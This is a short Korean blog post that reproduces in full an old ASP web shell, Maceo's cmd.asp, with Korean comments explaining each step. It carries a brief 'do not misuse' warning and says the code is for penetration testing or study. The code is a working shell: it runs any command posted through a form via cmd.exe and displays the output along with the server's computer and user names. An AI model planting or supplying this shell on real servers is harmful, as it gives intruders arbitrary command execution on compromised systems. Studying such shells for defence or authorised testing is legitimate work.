KOROMOON

착한 사마리아인이 되고 싶습니다.

2/17/2020

Maceo's cmd.asp (Simple ASP WebShell)


악용하지 마세요!!!
마세오님이 만든 오래된 ASP 웹쉘 코드임.
모의해킹이나 공부할 용도로만 사용함.



<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo@dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------

' -----------------코드 설명-----------------
' 먼저 폼을 통해 명령을 받아 WSCRIPT.SHELL
' 객체를 이용하여 명령을 실행함.
' 그리고 Scripting.FileSystemObject 객체를
' 통해 그 결과를 임시 파일에 저장한 뒤
' 화면에 보여주고, 임시 파일은 지워버림.
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next

' -- 우리가 사용할 COM 객체 만들기 -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

' -- 폼으로부터 받아온 값을 szCMD 변수에 저장 -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    szTempFile = "C:\" & oFileSys.GetTempName( )
    ' -- 명령을 실행하고 그 결과를 szTempFile에 저장 -- '
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    ' -- 임시 파일을 열어서 oFile 변수에 저장 -- '
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>

<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<!-- 컴퓨터 이름과 사용자 이름을 출력 -->
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
    '-- 만든 임시 파일의 내용을 읽어 화면에 보여준 후 임시 파일을 지움 --'
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

댓글 없음:

댓글 쓰기